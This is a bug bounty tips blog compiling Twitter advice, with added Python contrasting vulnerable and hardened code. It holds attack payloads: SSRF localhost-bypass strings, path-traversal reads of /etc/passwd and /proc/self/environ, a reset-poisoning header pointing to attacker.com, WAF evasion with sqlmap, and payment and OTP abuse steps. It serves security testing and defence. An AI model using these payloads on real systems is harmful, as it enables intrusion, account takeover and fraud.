#Bugbountytips

Before you start reading this post, let me tell you that all the tips are collected from Twitter (a few are mine 😓), where awesome community folks share their knowledge and experience. I tried to mention every single Twitter handle from which I took the tips; in case your name is missed out, please reach out to me. 😉

Authentication

# Access control checks that block a path can be bypassed by adding the X-Original-URL header: some frameworks route on that header (intended for reverse-proxy deployments; X-Rewrite-URL works the same way), while the check only sees the request-line path.
POST /admin/deleteUser HTTP/1.1 -> 403

POST / HTTP/1.1
X-Original-URL: /admin/deleteUser -> 200 OK

Bypass Success! The check saw "/", the application routed "/admin/deleteUser".
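The bypass above, reproduced as an added example (this is not code from the original post or from any real framework): a toy router whose ACL looks at the request-line path while dispatch honours the override header, next to the fixed version that strips the header unless it came from a trusted proxy and applies the ACL to the path that will actually be routed. The routes, the ACL and the "trusted proxy" flag are constructed for illustration.

```python
# Added example, not code from the original post: a minimal router that
# reproduces the X-Original-URL bypass and the fix. Routes, ACL and the
# "honour override headers" behaviour are constructed assumptions.
from typing import Dict, Tuple

Request = Tuple[str, str, Dict[str, str]]      # (method, path, headers)

ROUTES = {"/", "/admin/deleteUser"}             # constructed route table
ADMIN_PREFIX = "/admin/"
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def overridden_path(path: str, headers: Dict[str, str]) -> str:
    """Path the application will route once override headers are honoured."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in OVERRIDE_HEADERS:
        if name in lowered:
            return lowered[name]
    return path


def acl_allows(path: str, is_admin: bool) -> bool:
    return is_admin or not path.startswith(ADMIN_PREFIX)


def dispatch(path: str) -> int:
    return 200 if path in ROUTES else 404


def vulnerable_handle(req: Request, is_admin: bool = False) -> int:
    """ACL sees the request-line path, the router sees the header: bypassable."""
    _method, path, headers = req
    if not acl_allows(path, is_admin):
        return 403
    return dispatch(overridden_path(path, headers))


def hardened_handle(req: Request, is_admin: bool = False,
                    from_trusted_proxy: bool = False) -> int:
    """Drop override headers unless our own proxy sent them, then run the ACL
    on the path that will actually be routed."""
    _method, path, headers = req
    if not from_trusted_proxy:
        headers = {k: v for k, v in headers.items()
                   if k.lower() not in OVERRIDE_HEADERS}
    routed = overridden_path(path, headers)
    if not acl_allows(routed, is_admin):
        return 403
    return dispatch(routed)
```

The simplest production fix is the first half of hardened_handle alone: strip X-Original-URL and X-Rewrite-URL at the edge (or never enable that feature) so no client-supplied value reaches the router.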

# Accessing the Admin Panel (path normalization: a front-end proxy or filter treats "admin..;" as a harmless segment, while a Tomcat-style backend strips "..;/" and serves /admin/)
https://target.com/admin/ - 302
https://target.com/admin..;/ - 200

IDOR

# Suppose you find an endpoint
GET /api_v1/messages?user_id=Your_user_id

Try
GET /api_v1/messages?user_id=Another_user_id
GET /api_v1/messages?user_id=Your_user_id&user_id=Another_user_id
GET /api_v1/messages?user_id=Another_user_id&user_id=Your_user_id

The duplicated-parameter variants exploit parameter pollution: an authorization layer may check one occurrence while the backend reads the other.
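Why the three probes above can disagree, as an added example that is not part of the original post: an authorization layer that reads the first occurrence of user_id and a backend that keeps the last one, beside a handler that refuses duplicated parameters. The user IDs, the message store and the "gateway checks first, backend reads last" split are constructed assumptions.

```python
# Added example (not from the original post): parameter pollution turning into
# an IDOR. MESSAGES and the first/last split are constructed for illustration.
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlencode

MESSAGES = {                                  # constructed sample data
    "1001": ["hello from 1001"],
    "2002": ["2002's private thread"],
}


def pick(query: str, name: str, which: str) -> Optional[str]:
    """First or last occurrence of a repeated query parameter, or None."""
    values = parse_qs(query, keep_blank_values=True).get(name, [])
    if not values:
        return None
    return values[0] if which == "first" else values[-1]


def vulnerable_messages(query: str, session_user: str) -> Tuple[int, List[str]]:
    """Authorization uses the FIRST user_id (say, an API gateway); the lookup
    uses the LAST one (say, a framework that keeps the last value)."""
    if pick(query, "user_id", "first") != session_user:
        return 403, []
    return 200, MESSAGES.get(pick(query, "user_id", "last"), [])


def hardened_messages(query: str, session_user: str) -> Tuple[int, List[str]]:
    """One parse, one value: refuse duplicated parameters outright, then
    authorize and fetch with the very same value."""
    values = parse_qs(query, keep_blank_values=True).get("user_id", [])
    if len(values) != 1:
        return 400, []
    if values[0] != session_user:
        return 403, []
    return 200, MESSAGES.get(values[0], [])


def pollution_probes(own: str, other: str) -> List[str]:
    """The three requests from the tip, for an endpoint /api_v1/messages."""
    return [
        "/api_v1/messages?" + urlencode([("user_id", other)]),
        "/api_v1/messages?" + urlencode([("user_id", own), ("user_id", other)]),
        "/api_v1/messages?" + urlencode([("user_id", other), ("user_id", own)]),
    ]
```

The more robust fix is to not accept user_id from the client at all for "my messages" endpoints and take it from the session; the duplicate rejection still matters for parameters that legitimately come from the client.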

CORS

# CORS Protection RegEx Bypass
If the target only allows the main domain and its subdomains, try prepending something to the main domain: a suffix check without a dot boundary accepts it. The bug is exploitable when the reflected origin comes with Access-Control-Allow-Credentials: true.

Origin: https://target.com --> Access-Control-Allow-Origin: https://target.com
Origin: https://eviltarget.com --> Not Vulnerable
Origin: https://sub.eviltarget.com --> Access-Control-Allow-Origin: https://sub.eviltarget.com
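An added example (not code from the original post) of the weak check and its replacement. The exact regex behind the tip is not shown, so the weak side here is an assumed suffix match with no dot boundary; the strict side parses the Origin as a URL and compares the host label by label, which is the check a practitioner should write.

```python
# Added example, not from the original post: weak suffix match vs. a strict
# Origin allowlist. WEAK_PATTERN is an assumed regex, not the target's real one.
import re
from typing import Dict, Optional
from urllib.parse import urlsplit

OUR_DOMAIN = "target.com"
WEAK_PATTERN = re.compile(r"target\.com$")     # assumed: no dot boundary, no scheme check


def weak_allow_origin(origin: str) -> Optional[str]:
    """Value to reflect in Access-Control-Allow-Origin, or None."""
    return origin if WEAK_PATTERN.search(origin) else None


def strict_allow_origin(origin: str) -> Optional[str]:
    """Parse the Origin as a URL; require https and an exact domain or a
    genuine subdomain (host == domain or host ends with '.' + domain)."""
    parts = urlsplit(origin)
    host = parts.hostname                       # lower-cased, brackets stripped
    if parts.scheme != "https" or not host or parts.path or parts.query:
        return None                             # also rejects "null" and bare words
    if host == OUR_DOMAIN or host.endswith("." + OUR_DOMAIN):
        return origin
    return None


def cors_headers(origin: str, allow_fn) -> Dict[str, str]:
    """Headers a response would carry for this Origin under a given policy."""
    allowed = allow_fn(origin)
    if allowed is None:
        return {}
    return {
        "Access-Control-Allow-Origin": allowed,
        "Access-Control-Allow-Credentials": "true",   # what makes reflection dangerous
        "Vary": "Origin",
    }
```

Note that the strict check still reflects any subdomain; if one subdomain hosts user content or has XSS, it can read the main site cross-origin, so narrow the allowlist to named hosts where you can.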

SQL Injection

# If you ever get stuck with SQL injection behind an IP-based WAF
1. Use the IP Rotate extension in Burp and configure it with AWS credentials (each request leaves from a different API Gateway IP)
2. Run sqlmap with the --proxy flag to route its traffic through Burp
3. Block bypassed, injection exploited


RCE

# Handy as hell tip for checking which functions you need to bypass in PHP (the disable_functions list):
<?php var_dump(explode(',', ini_get('disable_functions'))); ?>

Parse cvedetails.com for CVEs with a score of 6+ from the last 3 years. Visit the reference pages of the web-facing ones in that filter, grab the vulnerable paths, and build your own RCE wordlist from them.


SSRF

# Bypass a localhost IP blocklist in SSRF
Create a subdomain of your own and point its A record at 127.0.0.1.
You can also use an existing subdomain that resolves to the localhost IP, e.g. spoofed.burpcollaborator.net.

# One-liner commands (both manual & automatic)

Automatic one-liner SSRF (nuclei template):
assetfinder --subs-only target | httprobe | gau | gf ssrf | nuclei -t nuclei-templates/vulnerabilities/microstrategy-ssrf.yaml -o result.txt

Manual testing SSRF (route every candidate URL through Burp):
assetfinder --subs-only target | httprobe | gau | gf ssrf | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk 2>/dev/null

Then use Burp Collaborator as the SSRF target to confirm out-of-band callbacks.

# Using the IP in decimal to bypass a blacklisted '.' character
Google IP: 216.58.212.110
Google IP Decimal: 3627734126
Example: target.com?redirect=http://3627734126 - Done

# Bypassing SSRF filters with CIDR (the whole 127.0.0.0/8 block is loopback, not just 127.0.0.1)
http://127.127.127.127
http://127.0.0.1

# Bypass using rare address forms (inet_aton accepts short forms; 0 means "this host")
http://127.1
http://0/

# Bypass using a combination of tricks (different parsers pick different hosts)
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib : 3.3.3.3

# Bypass against a weak parser
http://127.1.1.1:80\@127.2.2.2:80/

# Bypass localhost with [::]
http://[::]:80/
http://0000::1:80/
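The address tricks above generalized, as an added example that is not code from the original post: one helper spells an IPv4 address the ways a libc inet_aton() accepts (decimal, hex, octal, IPv6-mapped), and a hardened checker collapses any literal back to a canonical address before deciding, which is what a string blocklist fails to do. Only IP literals are handled; hostnames are returned as "undecided" for the caller to resolve. The sample address is the one the post uses.

```python
# Added example, not from the original post. Generates the alternative
# spellings an SSRF filter must survive and shows the normalize-then-check
# defence. IP literals only; see url_allowed() for hostnames.
import ipaddress
import socket
from typing import Dict, Optional, Union
from urllib.parse import urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def ip_variants(dotted: str) -> Dict[str, str]:
    """Alternative spellings of a dotted quad that inet_aton() accepts."""
    o = [int(x) for x in dotted.split(".")]
    n = (o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]
    return {
        "decimal": str(n),                              # 3627734126
        "hex": hex(n),                                  # 0xd83ad46e
        "octal": ".".join("0%o" % x for x in o),        # 0330.072.0324.0156
        "ipv6_mapped": "[::ffff:%s]" % dotted,          # [::ffff:216.58.212.110]
    }


def canonical_ip(host: str) -> Optional[IPAddr]:
    """Collapse any IP literal (127.1, 0, decimal, hex, octal, [::], ::ffff:a.b.c.d)
    to a canonical address object; None if the host is not a literal at all."""
    h = host.strip("[]")
    try:
        # inet_aton() applies the same loose parsing the HTTP client will use.
        return ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(h)))
    except OSError:
        pass
    try:
        addr = ipaddress.ip_address(h)
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            return addr.ipv4_mapped                     # ::ffff:127.0.0.1 -> 127.0.0.1
        return addr
    except ValueError:
        return None


def is_internal(addr: IPAddr) -> bool:
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved or addr.is_multicast)


def url_allowed(url: str) -> Optional[bool]:
    """True/False for IP literals. None for hostnames: resolve them, run
    is_internal() on every A/AAAA record, and pin the checked IP for the
    actual connection, or DNS rebinding undoes the check."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    addr = canonical_ip(parts.hostname)
    if addr is None:
        return None
    return not is_internal(addr)
```

Redirects need the same treatment: check the target of every 3xx hop, not just the first URL, or the filter is bypassed by a public host that redirects to 127.0.0.1.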

# Sentry Blind SSRF
1. cat aquatone/*/urls.txt | grep sentry (find Sentry endpoints in your recon output)
2. Capture a request to one of them in Burp Suite
3. Send it to Repeater
4. Change the value of filename: to a postb.in URL (or similar)
5. Wait for a connection

See a target running on Nginx?
GET @xx.collab.net/ HTTP/1.1   (or GET xxx.collaborator.net/ HTTP/1.1)
Host: target[.]com

Always try absolute URLs in the request line. This has affected many apps; old is gold for SSRF.

A small Burp Suite trick which helped me to find Blind SSRF
1: Use Intruder to brute-force headers
2: Add a Burp Collaborator URL as the value.
3: Add a numerical prefix payload (Pitchfork)
4: Use the Taborator extension to monitor hits


Security Misconfiguration

# Easy way to find exposed production code:
1. Find a GitLab-hosted subdomain, usually named "code.domain" or "gitlab.domain"
2. Even if login is required, try the "/snippets" endpoint; public snippets are listed there without an account
3. View internal source code snippets.

# Ways to bypass rate limiting
1. Add an IP-hint request header such as X-Remote-IP: 127.0.0.1 (X-Forwarded-For, X-Originating-IP, X-Client-IP and X-Real-IP are worth trying too): the limiter keys on the spoofed value
2. Add a 'space' after the parameter value
3. Use null bytes and CRLF: %00, %0d%0a, %09, %20, %0
4. Change the User-Agent and/or cookies
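Bypass 1 above works because the limiter trusts a client-supplied IP header. The following added example (not code from the original post) shows a rate limiter keyed on such a header, which an attacker can reset on every request, beside one that only honours X-Forwarded-For when the TCP peer is one of our own proxies. The proxy range, the limit and the peer addresses are constructed assumptions.

```python
# Added example, not from the original post: rate-limit keying on spoofable IP
# hints vs. a trusted-proxy-aware client IP. TRUSTED_PROXIES is an assumption.
import ipaddress
from collections import Counter
from typing import Callable, Dict

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]   # assumed: our own load balancers
HINT_HEADERS = ("x-remote-ip", "x-forwarded-for", "x-originating-ip",
                "x-client-ip", "x-real-ip")


def vulnerable_client_ip(peer: str, headers: Dict[str, str]) -> str:
    """Trusts any client-supplied hint: the attacker chooses the rate-limit key."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in HINT_HEADERS:
        if name in lowered:
            return lowered[name].split(",")[0].strip()
    return peer


def hardened_client_ip(peer: str, headers: Dict[str, str]) -> str:
    """Honour X-Forwarded-For only if the socket peer is our proxy, and walk the
    chain right-to-left so the first hop we did not append is the client."""
    lowered = {k.lower(): v for k, v in headers.items()}
    chain = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(chain + [peer]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer                 # garbage in the header: fall back to the socket peer
        if not any(addr in net for net in TRUSTED_PROXIES):
            return str(addr)
    return peer                         # every hop was ours; nothing better to key on


class RateLimiter:
    def __init__(self, limit: int, keyfunc: Callable[[str, Dict[str, str]], str]):
        self.limit, self.keyfunc, self.seen = limit, keyfunc, Counter()

    def allow(self, peer: str, headers: Dict[str, str]) -> bool:
        key = self.keyfunc(peer, headers)
        self.seen[key] += 1
        return self.seen[key] <= self.limit


def login_attempts(limiter: RateLimiter, peer: str, n: int) -> int:
    """n attempts from one socket peer, each spoofing a fresh X-Forwarded-For;
    returns how many the limiter let through."""
    allowed = 0
    for i in range(n):
        if limiter.allow(peer, {"X-Forwarded-For": f"198.51.100.{i}"}):
            allowed += 1
    return allowed
```

Bypasses 2 to 4 in the list are a different defect: the limiter keys on the raw request (parameter bytes, User-Agent, cookie) rather than on the account or source, so any cosmetic change to the request starts a new bucket.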


File Upload 

Extension list for file upload bugs (ASP/ASP.NET):
".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer", ".shtml"

Local File Inclusion

# How to find local file read vulnerabilities based on cookies (the cookie value is used as a file name).
Request
GET /vulnerable.php HTTP/1.1
Cookie: usid=../../../../../../../../../../../../../etc/passwd

Response
HTTP/1.1 200 OK
...
Server: Apache

root:fi3sER6:0:1:System Operator:/:/bin/ksh

# If you've got a cloud system and an LFI, always have a peek at /etc/fstab: you might find more mounts, like S3 buckets or EFS shares, with more juice.

# Escalate local file Inclusion
Try these files: "/proc/self/cmdline" "/proc/self/environ".  There might be keys or other sensitive information in there or it might give you ideas for other paths to investigate.

Account Takeover

# Password reset poisoning via Host / X-Forwarded-Host
1. Go to "forgot password", enter the email and request a reset.
2. Intercept this request.
3. Add the header "X-Forwarded-Host: attacker.com".
4. Forward the request and check your email inbox.
5. If the password reset link looks like "http://www.attacker.com/reset-password/<reset_token>", the application builds the link from client-controlled headers: a victim who clicks such a link hands the token to attacker.com.
6. To confirm the leaked link is valid, replace attacker.com with the original host and open it.

# Using the password reset code more than once

Reset password base64 code/token:
cGFzc3dvcmR0b2tlbg=

Add another equals sign:
cGFzc3dvcmR0b2tlbg==

Add another equals sign:
cGFzc3dvcmR0b2tlbg===

Each time you add another equals sign, the code works again: the server marks the submitted string as used, but a lenient base64 decoder ignores the padding, so every variant decodes to the same token.
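Both account-takeover tips above in one added example (this is a toy service written for this page, not code from the original post): a reset flow that derives the link host from X-Forwarded-Host and records used tokens by the submitted string, beside one that uses a configured origin and consumes the decoded token exactly once. The canonical base URL, the lenient decoder that imitates permissive base64 implementations, and the in-memory stores are constructed assumptions.

```python
# Added example, not from the original post: the two password-reset bugs
# (host poisoning, padding-based token reuse) and their fixes, side by side.
import base64
import secrets
from typing import Dict, Optional

CANONICAL_BASE = "https://www.example.com"   # assumption: the app's configured public origin


def lenient_b64decode(s: str) -> bytes:
    """Imitate permissive decoders: discard whatever padding the client sent
    and re-derive it, so 'abc=', 'abc==' and 'abc===' all yield the same bytes."""
    s = s.rstrip("=")
    return base64.b64decode(s + "=" * (-len(s) % 4))


class VulnerableResetService:
    def __init__(self) -> None:
        self.live = set()   # raw tokens that have been issued
        self.used = set()   # submitted STRINGS that were redeemed (the bug)

    def issue(self, headers: Dict[str, str], raw: Optional[bytes] = None) -> str:
        raw = raw or secrets.token_bytes(16)
        self.live.add(raw)
        token = base64.b64encode(raw).decode()
        # Bug 1: link host taken from client-controlled headers; X-Forwarded-Host wins.
        host = headers.get("X-Forwarded-Host") or headers.get("Host")
        return f"https://{host}/reset-password/{token}"

    def redeem(self, token: str) -> bool:
        if token in self.used:
            return False
        try:
            raw = lenient_b64decode(token)
        except ValueError:
            return False
        if raw not in self.live:
            return False
        self.used.add(token)    # Bug 2: remembers the string, so "token=" and "token===" look new
        return True


class HardenedResetService:
    def __init__(self) -> None:
        self.live = set()

    def issue(self, headers: Dict[str, str], raw: Optional[bytes] = None) -> str:
        raw = raw or secrets.token_bytes(16)
        self.live.add(raw)
        token = base64.b64encode(raw).decode()
        # Fix 1: never derive the link origin from request headers.
        return f"{CANONICAL_BASE}/reset-password/{token}"

    def redeem(self, token: str) -> bool:
        try:
            raw = base64.b64decode(token, validate=True)   # Fix 2a: strict decoding
        except ValueError:                                  # binascii.Error is a ValueError
            return False
        if raw not in self.live:
            return False
        self.live.discard(raw)     # Fix 2b: consume the decoded token, single use by construction
        return True
```

Strict decoding alone would not be enough if some other code path still decoded leniently; removing the decoded token from the live set is what makes reuse impossible regardless of how the string was spelled.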


Full Path Disclosure

# A useful tip for finding Full Path Disclosure vulnerabilities 
Drop an array ([] or even [1,2,3]) into a parameter. This can produce a full path disclosure error in response.


Price Manipulation Bugs

# Bypass the payment process and get the product without paying

1. It is preferable to choose PayPal or CoinPayments as the payment method.
2. Intercept all requests; you may find a parameter called 'Success', 'Referrer' or 'Callback'.
3. Its value may be a URL such as example.com/payment/MD5HASH, the page the payment provider sends you back to on success.
4. Copy it and open it in a new window: if the shop trusts the redirect alone and never verifies the payment with the provider, your order is marked as paid.

# If the product price parameter cannot be changed, change the quantity of products

items[1][quantity]=1   --> 234 $
items[1][quantity]=0.1 --> 23.4 $

Congratulations, you bought the order for 10% of the price: the server multiplied by a fractional quantity and ships a whole item.

1. Add two products to the basket [let's say a laptop at $40 and a mobile at $70]
2. If the request is processed in this way: {"items":{"laptop":1,"mobile":1}}
3. Change the JSON body to {"items":{"laptop":4,"mobile":-2}}
4. The cost becomes $20 for the two line items: 4 * $40 - 2 * $70 = $160 - $140 = $20 (a negative quantity is subtracted instead of rejected)
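The two quantity bugs above, as an added example that is not code from the original post: a checkout that multiplies whatever the client sent, beside one that validates each quantity as a bounded positive integer before pricing. The catalog prices match the tip; the JSON bodies are the ones shown above.

```python
# Added example, not from the original post: fractional and negative
# quantities in a cart total. CATALOG prices are constructed to match the tip.
import json
from decimal import Decimal
from typing import Dict

CATALOG: Dict[str, Decimal] = {"laptop": Decimal("40"), "mobile": Decimal("70")}


def vulnerable_total(body: str) -> Decimal:
    """Prices whatever arrived: 0.1 of a laptop, minus two mobiles, all accepted."""
    items = json.loads(body)["items"]
    return sum((CATALOG[name] * Decimal(str(qty)) for name, qty in items.items()),
               Decimal(0))


def hardened_total(body: str, max_qty: int = 99) -> Decimal:
    """Reject unknown items, non-integer or out-of-range quantities; the total
    is then positive by construction."""
    items = json.loads(body)["items"]
    if not items:
        raise ValueError("empty cart")
    total = Decimal(0)
    for name, qty in items.items():
        if name not in CATALOG:
            raise ValueError(f"unknown item {name!r}")
        # JSON true/false parse as bool, a subclass of int: exclude explicitly.
        if isinstance(qty, bool) or not isinstance(qty, int):
            raise ValueError(f"quantity for {name!r} must be an integer")
        if not 1 <= qty <= max_qty:
            raise ValueError(f"quantity for {name!r} out of range")
        total += CATALOG[name] * qty
    return total


def checkout_accepted(body: str) -> bool:
    """True if the hardened checkout would price this body at all."""
    try:
        hardened_total(body)
        return True
    except ValueError:
        return False
```

The same rule applies to the form-encoded items[1][quantity]=0.1 variant: parse the quantity as an integer with a range check, never as a float, and compute the total server-side from catalog prices rather than from any price field the client sends.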

2FA

# No limit on sending OTPs by SMS
Impact: SMS flooding (DoS) of the user's phone

# No limit on refreshing the OTP
You can brute-force "infinitely": keep refreshing the OTP while guessing; each refresh gives a fresh code to guess, with a low but non-zero chance per attempt

# Brute-force the OTP if there is no limit on verification attempts

# Check if
No 2FA is required to disable 2FA on the account
No 2FA confirmation is required for a password change
After 2FA activation, other existing sessions stay active
You can reuse an OTP issued for one action for another
You can reuse your OTP to log in as another user

# Observe whether a valid session is already created after the password check alone; if so, skip the 2FA step and use it (ignore 2FA)

# The OTP is associated with a token. After refreshing, a new OTP is associated with a new token, but the old pair is still valid.

# Sometimes the OTP is leaked in a header, the response body or an error message

# Try requesting OTPs for different users in the same second and compare them.



Credits:
ADITYASHENDE17, jae_hak99, Random_Robbie, SalahHasoneh1, heald_ben, hsakarp_ilajna, Jhaddix, th3hokag3, Virdoex_hunter, Harshithvelneni, chiraggupta8769, trbughunters, EngMada9, scspcommunity, _n0nce, lutfumertceylan, cybersec_feeds, manas_hunter, AkaaZaan, bpruston, AmitMDubey, hackerscrolls


(If you like the blog, share it with others 💓. 
DM or tag me in tweets if you want to include any other bugbountytips in this blog.)